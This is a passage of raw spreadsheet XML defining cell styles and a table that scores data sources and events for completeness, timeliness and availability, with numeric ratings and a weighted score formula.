    </xf>
    <xf numFmtId="0" fontId="7"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4" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Rated" xfId="1" xr:uid="{8A464A3E-13A2-4CC0-92F8-C726D44B3362}"/>
  </cellStyles>
  <dxfs count="6">
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="0"/>
        <name val="Consolas"/>
        <family val="3"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="1" formatCode="0"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>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colors>
    <mruColors>
      <color rgb="FF0C1B33"/>
      <color rgb="FF2C578C"/>
      <color rgb="FF1F3F64"/>
      <color rgb="FF76AA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226054-05BC-4A55-9703-8BBA488151DD}" name="Table1" displayName="Table1" ref="A1:F1048576" totalsRowShown="0" headerRowDxfId="0" dataDxfId="1">
  <autoFilter ref="A1:F1048576" xr:uid="{ED934771-C552-4D08-ADBD-D70254E3F9DD}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{6ECE0E35-3316-45CF-9BFC-AC16287F992C}" name="DataSource"/>
    <tableColumn id="2" xr3:uid="{59B3BCB5-4CDA-4A44-82CF-7BF4D5D5305E}" name="Event"/>
    <tableColumn id="3" xr3:uid="{C3B040B2-E4B8-467D-95B5-5CEFAE274F2F}" name="Completeness" dataDxfId="5"/>
    <tableColumn id="4" xr3:uid="{3E12F652-A295-468D-843C-B72978521815}" name="Timeliness" dataDxfId="4"/>
    <tableColumn id="5" xr3:uid="{91BDD6AF-A0CC-49F7-A91A-55A220B9394B}" name="Availability" dataDxfId="3"/>
    <tableColumn id="6" xr3:uid="{3EB33050-E516-4061-B267-9F3B43A7C133}" name="Score" dataDxfId="2"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9"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62"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="B10" sqref="B10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="34.85546875" customWidth="1"/>
    <col min="2" max="2" width="105.28515625" customWidth="1"/>
    <col min="3" max="5" width="20.7109375" style="2" customWidth="1"/>
    <col min="6" max="6" width="32.42578125" style="1" customWidth="1"/>
    <col min="7" max="26" width="9.140625" style="3"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="33" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="19" t="s">
        <v>289</v>
      </c>
      <c r="B1" s="19" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="8" t="s">
        <v>285</v>
      </c>
      <c r="D1" s="8" t="s">
        <v>287</v>
      </c>
      <c r="E1" s="8" t="s">
        <v>288</v>
      </c>
      <c r="F1" s="9" t="s">
        <v>290</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A2" s="6" t="s">
        <v>291</v>
      </c>
      <c r="B2" s="6" t="s">
        <v>292</v>
      </c>
      <c r="C2" s="7">
        <v>0</v>
      </c>
      <c r="D2" s="7">
        <v>0</v>
      </c>
      <c r="E2" s="7">
        <v>0</v>
      </c>
      <c r="F2" s="7">
        <f t="shared" ref="F2:F6" si="0">((C2*2)+D2+(E2*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3" s="6" t="s">
        <v>291</v>
      </c>
      <c r="B3" s="6" t="s">
        <v>293</v>
      </c>
      <c r="C3" s="7">
        <v>0</v>
      </c>
      <c r="D3" s="7">
        <v>0</v>
      </c>
      <c r="E3" s="7">
        <v>0</v>
      </c>
      <c r="F3" s="7">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4" s="6" t="s">
        <v>291</v>
      </c>
      <c r="B4" s="6" t="s">
        <v>294</v>
      </c>
      <c r="C4" s="7">
        <v>0</v>
      </c>
      <c r="D4" s="7">
        <v>0</v>
      </c>
      <c r="E4" s="7">
        <v>0</v>
      </c>
      <c r="F4" s="7">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A5" s="6" t="s">
        <v>291</v>
      </c>
      <c r="B5" s="6" t="s">
        <v>295</v>
      </c>
      <c r="C5" s="7">
        <v>5</v>
      </c>
      <c r="D5" s="7">
        <v>5</v>
      </c>
      <c r="E5" s="7">
        <v>5</v>
      </c>
      <c r="F5" s="7">
        <f>((C5*2)+D5+(E5*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A6" s="6" t="s">
        <v>296</v>
      </c>
      <c r="B6" s="6"/>
      <c r="C6" s="7">
        <v>0</v>
      </c>
      <c r="D6" s="7">
        <v>0</v>
      </c>
      <c r="E6" s="7">
        <v>0</v>
      </c>
      <c r="F6" s="7">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A7" s="6" t="s">
        <v>297</v>
      </c>
      <c r="B7" s="6" t="s">
        <v>298</v>
      </c>
      <c r="C7" s="7">
        <v>5</v>
      </c>
      <c r="D7" s="7">
        <v>5</v>
      </c>
      <c r="E7" s="7">
        <v>5</v>
      </c>
      <c r="F7" s="7">
        <f>((C7*2)+D7+(E7*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A8" s="6" t="s">
        <v>297</v>
      </c>
      <c r="B8" s="6" t="s">
        <v>299</v>
      </c>
      <c r="C8" s="7">
        <v>5</v>
      </c>
      <c r="D8" s="7">
        <v>5</v>
      </c>
      <c r="E8" s="7">
        <v>5</v>
      </c>
      <c r="F8" s="7">
        <f t="shared" ref="F8:F70" si="1">((C8*2)+D8+(E8*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9" s="6" t="s">
        <v>297</v>
      </c>
      <c r="B9" s="6" t="s">
        <v>300</v>
      </c>
      <c r="C9" s="7">
        <v>3</v>
      </c>
      <c r="D9" s="7">
        <v>1</v>
      </c>
      <c r="E9" s="7">
        <v>1</v>
      </c>
      <c r="F9" s="7">
        <f t="shared" si="1"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10" s="6" t="s">
        <v>301</v>
      </c>
      <c r="B10" s="6"/>
      <c r="C10" s="7">
        <v>3</v>
      </c>
      <c r="D10" s="7">
        <v>5</v>
      </c>
      <c r="E10" s="7">
        <v>1</v>
      </c>
      <c r="F10" s="7">
        <f t="shared" si="1"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A11" s="6" t="s">
        <v>302</v>
      </c>
      <c r="B11" s="6"/>
      <c r="C11" s="7">
        <v>0</v>
      </c>
      <c r="D11" s="7">
        <v>0</v>
      </c>
      <c r="E11" s="7">
        <v>0</v>
      </c>
      <c r="F11" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12" s="6" t="s">
        <v>303</v>
      </c>
      <c r="B12" s="6" t="s">
        <v>304</v>
      </c>
      <c r="C12" s="7">
        <v>2.5</v>
      </c>
      <c r="D12" s="7">
        <v>1</v>
      </c>
      <c r="E12" s="7">
        <v>1</v>
      </c>
      <c r="F12" s="7">
        <f t="shared" si="1"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13" s="6" t="s">
        <v>305</v>
      </c>
      <c r="B13" s="6" t="s">
        <v>330</v>
      </c>
      <c r="C13" s="7">
        <v>0</v>
      </c>
      <c r="D13" s="7">
        <v>0</v>
      </c>
      <c r="E13" s="7">
        <v>0</v>
      </c>
      <c r="F13" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14" s="6" t="s">
        <v>306</v>
      </c>
      <c r="B14" s="6" t="s">
        <v>307</v>
      </c>
      <c r="C14" s="7">
        <v>3</v>
      </c>
      <c r="D14" s="7">
        <v>4</v>
      </c>
      <c r="E14" s="7">
        <v>5</v>
      </c>
      <c r="F14" s="7">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15" s="6" t="s">
        <v>308</v>
      </c>
      <c r="B15" s="6"/>
      <c r="C15" s="7">
        <v>0</v>
      </c>
      <c r="D15" s="7">
        <v>0</v>
      </c>
      <c r="E15" s="7">
        <v>0</v>
      </c>
      <c r="F15" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16" s="6" t="s">
        <v>309</v>
      </c>
      <c r="B16" s="6"/>
      <c r="C16" s="7">
        <v>0</v>
      </c>
      <c r="D16" s="7">
        <v>0</v>
      </c>
      <c r="E16" s="7">
        <v>0</v>
      </c>
      <c r="F16" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17" s="6" t="s">
        <v>310</v>
      </c>
      <c r="B17" s="6"/>
      <c r="C17" s="7">
        <v>0</v>
      </c>
      <c r="D17" s="7">
        <v>0</v>
      </c>
      <c r="E17" s="7">
        <v>0</v>
      </c>
      <c r="F17" s="7">
        <f>((C17*2)+D17+(E17*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A18" s="6" t="s">
        <v>311</v>
      </c>
      <c r="B18" s="6" t="s">
        <v>312</v>
      </c>
      <c r="C18" s="7">
        <v>0</v>
      </c>
      <c r="D18" s="7">
        <v>0</v>
      </c>
      <c r="E18" s="7">
        <v>0</v>
      </c>
      <c r="F18" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19" s="6" t="s">
        <v>311</v>
      </c>
      <c r="B19" s="6" t="s">
        <v>313</v>
      </c>
      <c r="C19" s="7">
        <v>2</v>
      </c>
      <c r="D19" s="7">
        <v>4</v>
      </c>
      <c r="E19" s="7">
        <v>5</v>
      </c>
      <c r="F19" s="7">
        <f>((C19*2)+D19+(E19*2))/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20" s="6" t="s">
        <v>311</v>
      </c>
      <c r="B20" s="6" t="s">
        <v>314</v>
      </c>
      <c r="C20" s="7">
        <v>2</v>
      </c>
      <c r="D20" s="7">
        <v>4</v>
      </c>
      <c r="E20" s="7">
        <v>5</v>
      </c>
      <c r="F20" s="7">
        <f>((C20*2)+D20+(E20*2))/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21" s="6" t="s">
        <v>311</v>
      </c>
      <c r="B21" s="6" t="s">
        <v>315</v>
      </c>
      <c r="C21" s="7">
        <v>2</v>
      </c>
      <c r="D21" s="7">
        <v>4</v>
      </c>
      <c r="E21" s="7">
        <v>5</v>
      </c>
      <c r="F21" s="7">
        <f>((C21*2)+D21+(E21*2))/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22" s="6" t="s">
        <v>311</v>
      </c>
      <c r="B22" s="6" t="s">
        <v>316</v>
      </c>
      <c r="C22" s="7">
        <v>0</v>
      </c>
      <c r="D22" s="7">
        <v>0</v>
      </c>
      <c r="E22" s="7">
        <v>0</v>
      </c>
      <c r="F22" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23" s="6" t="s">
        <v>317</v>
      </c>
      <c r="B23" s="6"/>
      <c r="C23" s="7">
        <v>0</v>
      </c>
      <c r="D23" s="7">
        <v>0</v>
      </c>
      <c r="E23" s="7">
        <v>0</v>
      </c>
      <c r="F23" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A24" s="6" t="s">
        <v>318</v>
      </c>
      <c r="B24" s="6" t="s">
        <v>319</v>
      </c>
      <c r="C24" s="7">
        <v>3</v>
      </c>
      <c r="D24" s="7">
        <v>5</v>
      </c>
      <c r="E24" s="7">
        <v>5</v>
      </c>
      <c r="F24" s="7">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25" s="6" t="s">
        <v>318</v>
      </c>
      <c r="B25" s="6" t="s">
        <v>320</v>
      </c>
      <c r="C25" s="7">
        <v>0</v>
      </c>
      <c r="D25" s="7">
        <v>0</v>
      </c>
      <c r="E25" s="7">
        <v>0</v>
      </c>
      <c r="F25" s="7">
        <f>((C25*2)+D25+(E25*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26" s="6" t="s">
        <v>321</v>
      </c>
      <c r="B26" s="6" t="s">
        <v>307</v>
      </c>
      <c r="C26" s="7">
        <v>3</v>
      </c>
      <c r="D26" s="7">
        <v>5</v>
      </c>
      <c r="E26" s="7">
        <v>5</v>
      </c>
      <c r="F26" s="7">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27" s="6" t="s">
        <v>322</v>
      </c>
      <c r="B27" s="6" t="s">
        <v>323</v>
      </c>
      <c r="C27" s="7">
        <v>0</v>
      </c>
      <c r="D27" s="7">
        <v>0</v>
      </c>
      <c r="E27" s="7">
        <v>0</v>
      </c>
      <c r="F27" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28" s="6" t="s">
        <v>322</v>
      </c>
      <c r="B28" s="6" t="s">
        <v>324</v>
      </c>
      <c r="C28" s="7">
        <v>3</v>
      </c>
      <c r="D28" s="7">
        <v>3</v>
      </c>
      <c r="E28" s="7">
        <v>5</v>
      </c>
      <c r="F28" s="7">
        <f>((C28*2)+D28+(E28*2))/5</f>
        <v>3.8</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A29" s="6" t="s">
        <v>325</v>
      </c>
      <c r="B29" s="6"/>
      <c r="C29" s="7">
        <v>0</v>
      </c>
      <c r="D29" s="7">
        <v>0</v>
      </c>
      <c r="E29" s="7">
        <v>0</v>
      </c>
      <c r="F29" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A30" s="6" t="s">
        <v>326</v>
      </c>
      <c r="B30" s="6"/>
      <c r="C30" s="7">
        <v>0</v>
      </c>
      <c r="D30" s="7">
        <v>0</v>
      </c>
      <c r="E30" s="7">
        <v>0</v>
      </c>
      <c r="F30" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A31" s="6" t="s">
        <v>327</v>
      </c>
      <c r="B31" s="6" t="s">
        <v>328</v>
      </c>
      <c r="C31" s="7">
        <v>0</v>
      </c>
      <c r="D31" s="7">
        <v>0</v>
      </c>
      <c r="E31" s="7">
        <v>0</v>
      </c>
      <c r="F31" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A32" s="6" t="s">
        <v>329</v>
      </c>
      <c r="B32" s="6" t="s">
        <v>330</v>
      </c>
      <c r="C32" s="7">
        <v>5</v>
      </c>
      <c r="D32" s="7">
        <v>5</v>
      </c>
      <c r="E32" s="7">
        <v>5</v>
      </c>
      <c r="F32" s="7">
        <f>((C32*2)+D32+(E32*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A33" s="6" t="s">
        <v>329</v>
      </c>
      <c r="B33" s="6" t="s">
        <v>331</v>
      </c>
      <c r="C33" s="7">
        <v>4</v>
      </c>
      <c r="D33" s="7">
        <v>4</v>
      </c>
      <c r="E33" s="7">
        <v>5</v>
      </c>
      <c r="F33" s="7">
        <f t="shared" si="1"/>
        <v>4.4000000000000004</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A34" s="6" t="s">
        <v>332</v>
      </c>
      <c r="B34" s="6" t="s">
        <v>333</v>
      </c>
      <c r="C34" s="7">
        <v>0</v>
      </c>
      <c r="D34" s="7">
        <v>0</v>
      </c>
      <c r="E34" s="7">
        <v>0</v>
      </c>
      <c r="F34" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A35" s="6" t="s">
        <v>334</v>
      </c>
      <c r="B35" s="6" t="s">
        <v>335</v>
      </c>
      <c r="C35" s="7">
        <v>0</v>
      </c>
      <c r="D35" s="7">
        <v>0</v>
      </c>
      <c r="E35" s="7">
        <v>0</v>
      </c>
      <c r="F35" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A36" s="6" t="s">
        <v>334</v>
      </c>
      <c r="B36" s="6" t="s">
        <v>336</v>
      </c>
      <c r="C36" s="7">
        <v>0</v>
      </c>
      <c r="D36" s="7">
        <v>0</v>
      </c>
      <c r="E36" s="7">
        <v>0</v>
      </c>
      <c r="F36" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A37" s="6" t="s">
        <v>337</v>
      </c>
      <c r="B37" s="6" t="s">
        <v>338</v>
      </c>
      <c r="C37" s="7">
        <v>1</v>
      </c>
      <c r="D37" s="7">
        <v>1</v>
      </c>
      <c r="E37" s="7">
        <v>1</v>
      </c>
      <c r="F37" s="7">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A38" s="6" t="s">
        <v>337</v>
      </c>
      <c r="B38" s="6" t="s">
        <v>339</v>
      </c>
      <c r="C38" s="7">
        <v>5</v>
      </c>
      <c r="D38" s="7">
        <v>5</v>
      </c>
      <c r="E38" s="7">
        <v>5</v>
      </c>
      <c r="F38" s="7">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="39" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A39" s="6" t="s">
        <v>337</v>
      </c>
      <c r="B39" s="6" t="s">
        <v>338</v>
      </c>
      <c r="C39" s="7">
        <v>1</v>
      </c>
      <c r="D39" s="7">
        <v>1</v>
      </c>
      <c r="E39" s="7">
        <v>1</v>
      </c>
      <c r="F39" s="7">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A40" s="6" t="s">
        <v>340</v>
      </c>
      <c r="B40" s="6" t="s">
        <v>338</v>
      </c>
      <c r="C40" s="7">
        <v>1</v>
      </c>
      <c r="D40" s="7">
        <v>1</v>
      </c>
      <c r="E40" s="7">
        <v>1</v>
      </c>
      <c r="F40" s="7">
        <f>((C40*2)+D40+(E40*2))/5</f>
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A41" s="6" t="s">
        <v>340</v>
      </c>
      <c r="B41" s="6" t="s">
        <v>341</v>
      </c>
      <c r="C41" s="7">
        <v>5</v>
      </c>
      <c r="D41" s="7">
        <v>5</v>
      </c>
      <c r="E41" s="7">
        <v>5</v>
      </c>
      <c r="F41" s="7">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="42" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A42" s="6" t="s">
        <v>340</v>
      </c>
      <c r="B42" s="6" t="s">
        <v>339</v>
      </c>
      <c r="C42" s="7">
        <v>5</v>
      </c>
      <c r="D42" s="7">
        <v>5</v>
      </c>
      <c r="E42" s="7">
        <v>5</v>
      </c>
      <c r="F42" s="7">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="43" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A43" s="6" t="s">
        <v>340</v>
      </c>
      <c r="B43" s="6" t="s">
        <v>342</v>
      </c>
      <c r="C43" s="7">
        <v>5</v>
      </c>
      <c r="D43" s="7">
        <v>5</v>
      </c>
      <c r="E43" s="7">
        <v>5</v>
      </c>
      <c r="F43" s="7">
        <f t="shared" ref="F43:F48" si="2">((C43*2)+D43+(E43*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A44" s="6" t="s">
        <v>340</v>
      </c>
      <c r="B44" s="6" t="s">
        <v>343</v>
      </c>
      <c r="C44" s="7">
        <v>5</v>
      </c>
      <c r="D44" s="7">
        <v>5</v>
      </c>
      <c r="E44" s="7">
        <v>5</v>
      </c>
      <c r="F44" s="7">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A45" s="6" t="s">
        <v>340</v>
      </c>
      <c r="B45" s="6" t="s">
        <v>344</v>
      </c>
      <c r="C45" s="7">
        <v>0</v>
      </c>
      <c r="D45" s="7">
        <v>0</v>
      </c>
      <c r="E45" s="7">
        <v>0</v>
      </c>
      <c r="F45" s="7">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A46" s="6" t="s">
        <v>340</v>
      </c>
      <c r="B46" s="6" t="s">
        <v>345</v>
      </c>
      <c r="C46" s="7">
        <v>0</v>
      </c>
      <c r="D46" s="7">
        <v>0</v>
      </c>
      <c r="E46" s="7">
        <v>0</v>
      </c>
      <c r="F46" s="7">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A47" s="6" t="s">
        <v>346</v>
      </c>
      <c r="B47" s="6" t="s">
        <v>347</v>
      </c>
      <c r="C47" s="7">
        <v>1</v>
      </c>
      <c r="D47" s="7">
        <v>5</v>
      </c>
      <c r="E47" s="7">
        <v>1</v>
      </c>
      <c r="F47" s="7">
        <f t="shared" si="2"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A48" s="6" t="s">
        <v>346</v>
      </c>
      <c r="B48" s="6" t="s">
        <v>348</v>
      </c>
      <c r="C48" s="7">
        <v>5</v>
      </c>
      <c r="D48" s="7">
        <v>4</v>
      </c>
      <c r="E48" s="7">
        <v>5</v>
      </c>
      <c r="F48" s="7">
        <f t="shared" si="2"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="49" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A49" s="6" t="s">
        <v>346</v>
      </c>
      <c r="B49" s="6" t="s">
        <v>349</v>
      </c>
      <c r="C49" s="7">
        <v>5</v>
      </c>
      <c r="D49" s="7">
        <v>4</v>
      </c>
      <c r="E49" s="7">
        <v>5</v>
      </c>
      <c r="F49" s="7">
        <f t="shared" ref="F49:F50" si="3">((C49*2)+D49+(E49*2))/5</f>
        <v>4.8</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A50" s="6" t="s">
        <v>346</v>
      </c>
      <c r="B50" s="6" t="s">
        <v>350</v>
      </c>
      <c r="C50" s="7">
        <v>5</v>
      </c>
      <c r="D50" s="7">
        <v>4</v>
      </c>
      <c r="E50" s="7">
        <v>5</v>
      </c>
      <c r="F50" s="7">
        <f t="shared" si="3"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="51" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A51" s="6" t="s">
        <v>351</v>
      </c>
      <c r="B51" s="6" t="s">
        <v>352</v>
      </c>
      <c r="C51" s="7">
        <v>5</v>
      </c>
      <c r="D51" s="7">
        <v>5</v>
      </c>
      <c r="E51" s="7">
        <v>5</v>
      </c>
      <c r="F51" s="7">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A52" s="6" t="s">
        <v>351</v>
      </c>
      <c r="B52" s="6" t="s">
        <v>353</v>
      </c>
      <c r="C52" s="7">
        <v>5</v>
      </c>
      <c r="D52" s="7">
        <v>5</v>
      </c>
      <c r="E52" s="7">
        <v>5</v>
      </c>
      <c r="F52" s="7">
        <f>((C52*2)+D52+(E52*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A53" s="6" t="s">
        <v>351</v>
      </c>
      <c r="B53" s="6" t="s">
        <v>354</v>
      </c>
      <c r="C53" s="7">
        <v>1</v>
      </c>
      <c r="D53" s="7">
        <v>5</v>
      </c>
      <c r="E53" s="7">
        <v>5</v>
      </c>
      <c r="F53" s="7">
        <f>((C53*2)+D53+(E53*2))/5</f>
        <v>3.4</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A54" s="6" t="s">
        <v>351</v>
      </c>
      <c r="B54" s="6" t="s">
        <v>355</v>
      </c>
      <c r="C54" s="7">
        <v>0</v>
      </c>
      <c r="D54" s="7">
        <v>0</v>
      </c>
      <c r="E54" s="7">
        <v>0</v>
      </c>
      <c r="F54" s="7">
        <f>((C54*2)+D54+(E54*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A55" s="6" t="s">
        <v>356</v>
      </c>
      <c r="B55" s="6" t="s">
        <v>357</v>
      </c>
      <c r="C55" s="7">
        <v>0</v>
      </c>
      <c r="D55" s="7">
        <v>0</v>
      </c>
      <c r="E55" s="7">
        <v>0</v>
      </c>
      <c r="F55" s="7">
        <f>((C55*2)+D55+(E55*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A56" s="6" t="s">
        <v>356</v>
      </c>
      <c r="B56" s="6" t="s">
        <v>358</v>
      </c>
      <c r="C56" s="7">
        <v>0</v>
      </c>
      <c r="D56" s="7">
        <v>0</v>
      </c>
      <c r="E56" s="7">
        <v>0</v>
      </c>
      <c r="F56" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A57" s="6" t="s">
        <v>356</v>
      </c>
      <c r="B57" s="6" t="s">
        <v>359</v>
      </c>
      <c r="C57" s="7">
        <v>0</v>
      </c>
      <c r="D57" s="7">
        <v>0</v>
      </c>
      <c r="E57" s="7">
        <v>0</v>
      </c>
      <c r="F57" s="7">
        <f>((C57*2)+D57+(E57*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A58" s="6" t="s">
        <v>360</v>
      </c>
      <c r="B58" s="6"/>
      <c r="C58" s="7">
        <v>0</v>
      </c>
      <c r="D58" s="7">
        <v>0</v>
      </c>
      <c r="E58" s="7">
        <v>0</v>
      </c>
      <c r="F58" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A59" s="6" t="s">
        <v>361</v>
      </c>
      <c r="B59" s="6"/>
      <c r="C59" s="7">
        <v>0</v>
      </c>
      <c r="D59" s="7">
        <v>0</v>
      </c>
      <c r="E59" s="7">
        <v>0</v>
      </c>
      <c r="F59" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A60" s="6" t="s">
        <v>362</v>
      </c>
      <c r="B60" s="6"/>
      <c r="C60" s="7">
        <v>0</v>
      </c>
      <c r="D60" s="7">
        <v>0</v>
      </c>
      <c r="E60" s="7">
        <v>0</v>
      </c>
      <c r="F60" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A61" s="6" t="s">
        <v>363</v>
      </c>
      <c r="B61" s="6"/>
      <c r="C61" s="7">
        <v>0</v>
      </c>
      <c r="D61" s="7">
        <v>0</v>
      </c>
      <c r="E61" s="7">
        <v>0</v>
      </c>
      <c r="F61" s="7">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
